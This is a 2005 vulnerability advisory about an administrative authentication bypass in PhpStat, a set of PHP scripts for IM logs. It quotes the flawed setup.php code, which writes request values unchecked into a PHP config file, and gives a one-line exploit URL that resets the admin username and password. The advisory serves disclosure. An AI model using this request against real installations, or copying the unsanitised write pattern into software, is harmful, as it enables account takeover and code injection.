===========================================================

============================================================
Title: PHP Stat
Vulnerability discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 25/05/2005
Severity: Medium. PHP Stat Administrative User Authentication Bypass
Affected version: unkown
vendor: http://phpstat.sourceforge.net/journal/
============================================================

============================================================

* Summary *

PhpStat is a set of PHP scripts that can analyze, sort, and generate statistics on IM 
log files from different clients and store the data in a database. It also allows for 
users to read their own logs.

-------------------------------------------------------------

* Problem Description *

The bug reside in $check var in setup.php.

Vulnerable Code

include("config.php");
include("$path_data/setup.php");
$check = $_REQUEST['check'];
$pass = $_REQUEST['pass'];
$user = $_REQUEST['user'];
if ($check == "admin" && $pass == $password && $user == $username) {
showsetup();
} elseif (($check == "admin") && ($pass != $password || $user != $username)) {
adminerror();
} elseif ($check == "yes") {
write($_REQUEST);
} else {
admin();


/*

when it sends a "yes" in setup.php this call to the function "write()"

*/

function write($_REQUEST) {
include("config.php");
 .
 .
 .
 .
 $admin = strtolower($_REQUEST['admin']);
 $username = strtolower($_REQUEST['username']);
 $password = strtolower($_REQUEST['password']);
 $fp = fopen("$path_data/setup.php", "wb") or die ("The File
\"$path_data/setup.php\" does not exist");
 flock( $fp, 2);
 fputs ($fp, "<?php\n\$show = \"$show\";\n\$refshow =
\"$refshow\";\n\$ldec = \"$ldec\";\n\$lcolor = \"$lcolor\";\n\$hcolor
= \"$hcolor\";\n\$font_family = \"$font_family\";\n\$font_size =
\"$font_size\";\n\$color = \"$color\";\n\$font_style =
\"$font_style\";\n\$font_weight = \"$font_weight\";\n\$letter_spacing
= \"$letter_spacing\";\n\$admin = \"$admin\";\n\$username =
\"$username\";\n\$password = \"$password\";\n?>");
 flock( $fp, 1);
 fclose ($fp);


where we you see

 setup.php?check=yes&username=admin&password=admin


-------------------------------------------------------------

* POC *

http://www.soulblack.com.ar/repo/tools/sbphpstatpoc.txt

-------------------------------------------------------------

* Fix *

  Use .htaccess or contact Vendor.

-------------------------------------------------------------

* References *

http://www.soulblack.com.ar/repo/papers/advisory/PhpStat_advisory.txt

-------------------------------------------------------------

* Credits *

Vulnerability reported by SoulBlack Security Research

============================================================

--
SoulBlack - Security Research
http://www.soulblack.com.ar